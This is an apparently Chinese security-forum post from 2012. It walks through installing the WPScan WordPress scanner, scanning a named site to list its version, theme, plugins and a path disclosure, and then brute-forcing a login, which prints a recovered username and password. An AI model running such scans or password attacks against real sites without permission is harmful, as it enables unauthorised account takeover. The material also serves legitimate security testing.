切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
312 Wpscan WORDPRESS PASSWORD[复制链接]
发表于 2012-10-12 23:39:03 | 显示全部楼层 |!read_mode!
安装
  1. root@Dis9Team:~# apt-get install libcurl4-gnutls-dev libopenssl-ruby
  2. root@Dis9Team:~# gem install typhoeus nokogiri json
  3. root@Dis9Team:~# cd /pen/web/
  4. root@Dis9Team:/pen/web# git clone git://github.com/wpscanteam/wpscan.git
复制代码
默认数据

这里有些作者收集的FUZZDB,有兴趣看看 整合下你的字典

  1. root@Dis9Team:/pen/web/wpscan/data# ls
  2. malwares.txt      plugins.txt       themes_full.txt  timthumbs.txt       wp_versions.xml
  3. plugins_full.txt  plugin_vulns.xml  themes.txt       wp_theme_vulns.xml  wp_vulns.xml
复制代码
默认测试
  1. root@Dis9Team:/pen/web/wpscan# ./wpscan.rb --url fuzzexp.org
  2. ____________________________________________________
  3. __          _______   _____                  
  4. \ \        / /  __ \ / ____|                 
  5.   \ \  /\  / /| |__) | (___   ___  __ _ _ __  
  6.    \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
  7.     \  /\  /  | |     ____) | (__| (_| | | | |
  8.      \/  \/   |_|    |_____/ \___|\__,_|_| |_| v2.0r9e293b3

  9.     WordPress Security Scanner by the WPScan Team
  10. Sponsored by the RandomStorm Open Source Initiative
  11. _____________________________________________________

  12. | URL: http://fuzzexp.org/
  13. | Started on Tue Sep 25 07:03:23 2012

  14. [!] The WordPress theme in use is openark-blog v1.1
  15. [!] The WordPress 'http://fuzzexp.org/readme.html' file exists
  16. [!] Full Path Disclosure (FPD) in 'http://fuzzexp.org/wp-includes/rss-functions.php'
  17. [!] WordPress version 3.4.1 identified from meta generator

  18. [+] Enumerating plugins from passive detection ... 6 found :

  19. | Name: my-videotag
  20. | Location: http://fuzzexp.org/wp-content/plugins/my-videotag/

  21. | Name: better-wordpress-syntax-based-on-geshi
  22. | Location: http://fuzzexp.org/wp-content/plugins/better-wordpress-syntax-based-on-geshi/

  23. | Name: Highslide_pre
  24. | Location: http://fuzzexp.org/wp-content/plugins/Highslide_pre/

  25. | Name: auto-highslide
  26. | Location: http://fuzzexp.org/wp-content/plugins/auto-highslide/

  27. | Name: down-as-pdf
  28. | Location: http://fuzzexp.org/wp-content/plugins/down-as-pdf/

  29. | Name: wordpress-wiki-plugin
  30. | Location: http://fuzzexp.org/wp-content/plugins/wordpress-wiki-plugin/

  31. [+] Finished at Tue Sep 25 07:03:30 2012
  32. root@Dis9Team:/pen/web/wpscan#
复制代码
获得了WP模板 WP版本 和一些插件信息破解密码
  1. root@Dis9Team:/pen/web/wpscan# ./wpscan.rb --url fuzzexp.org --wordlist /tmp/pass --username test
  2. [+] Starting the password brute forcer

  3.   Brute forcing user 'test' with 3 passwords... 100% complete.
  4.   [SUCCESS] Username : test Password : test


  5. [+] Finished at Tue Sep 25 07:05:55 2012
复制代码
获得详细信息
  1. root@Dis9Team:/pen/web/wpscan# ruby wpscan.rb --url fuzzexp.org --enumerate
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 10:40

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部